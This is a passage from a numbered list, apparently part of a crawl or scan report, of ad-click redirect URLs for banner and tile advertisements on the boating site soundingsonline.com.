20.372. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/300000781/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.373. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/301024327/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.374. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/307086521/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.375. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/311306263/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.376. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312414512/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.377. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312913212/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.378. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/317209443/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.379. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/318047660/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.380. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/319855659/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.381. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/321743525/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.382. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/338106476/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.383. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/350884461/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.384. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/358188109/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.385. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/361144958/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.386. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/373221580/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.387. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/37601243/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.388. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.389. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386885083/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.390. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/387825037/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.391. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/392919129/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

20.392. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396828855/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.393. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396936848/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.394. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/399157577/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.395. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/401425360/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.396. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/404785047/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.397. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/413179088/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.398. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/415127438/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.399. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/417517818/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.400. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/440360851/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.401. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/442122875/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.402. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/443045219/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.403. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/445245444/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.404. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/455812371/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.405. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/457264621/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.406. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/462425621/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.407. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/4636261/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.408. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/471646028/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

20.409. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488344786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.410. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.411. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.412. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/498236802/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.413. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/503116854/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.414. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/504603941/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.415. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/505023733/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.416. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/506110015/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.417. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/509899444/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.418. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/512512699/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.419. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/521112073/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.420. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/522788815/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.421. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/524588636/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

20.422. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/527036416/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.423. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/527433934/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.424. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.425. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/537473796/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.426. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/543871127/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.427. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/551185722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.428. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/559964392/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.429. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/560089787/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.430. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/566136437/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.431. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569227535/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.432. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/569370007/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.433. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/577895125/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.434. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/586884124/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.435. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/590122297/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.436. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/598276348/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.437. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.438. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/613368033/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.439. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/616635952/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.440. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/625092856/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.441. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/626621413/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.442. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/627769005/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.443. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/648001834/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.444. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/649757406/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.445. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/659749874/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.446. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/66254069/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.447. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662579504/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.448. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662641130/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

20.449. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/673709863/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.450. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/674816273/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.451. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/676472739/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.452. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/68136723/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.453. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/681435823/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

20.454. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/706664927/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.455. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/707347491/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.456. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/717893952/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.457. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/727119196/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.458. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/729172523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.459. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/730225288/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.460. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/732627183/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.461. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/738205021/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.462. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/739958962/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.463. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/745152942/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.464. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/746022267/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

20.465. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/747403924/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

20.466. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/762543895/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.467. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/763342559/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.468. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/767846817/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.469. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/770425453/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.470. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/772042684/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.471. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/781070973/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.472. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/783502762/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.473. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/806951846/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.474. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/808370228/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.475. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/810025955/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.476. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81126061/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.477. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/81555351/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.478. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/822911893/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.479. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/824392375/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.480. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/825907027/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.481. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/828468945/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.482. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/837487534/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.483. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/843686845/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.484. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/844694778/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.485. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/860655786/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.486. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/861795507/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.487. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/870635499/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

20.488. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/877352963/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.489. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/879719656/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.490. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/881866547/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.491. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/886342725/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.492. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/888728536/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.493. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/890602703/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

20.494. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/894545238/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

20.495. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897177615/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

20.496. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897548153/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

20.497. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/905894959/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

20.498. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/910555535/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

20.499. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/911268369/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

20.500. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/919674125/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

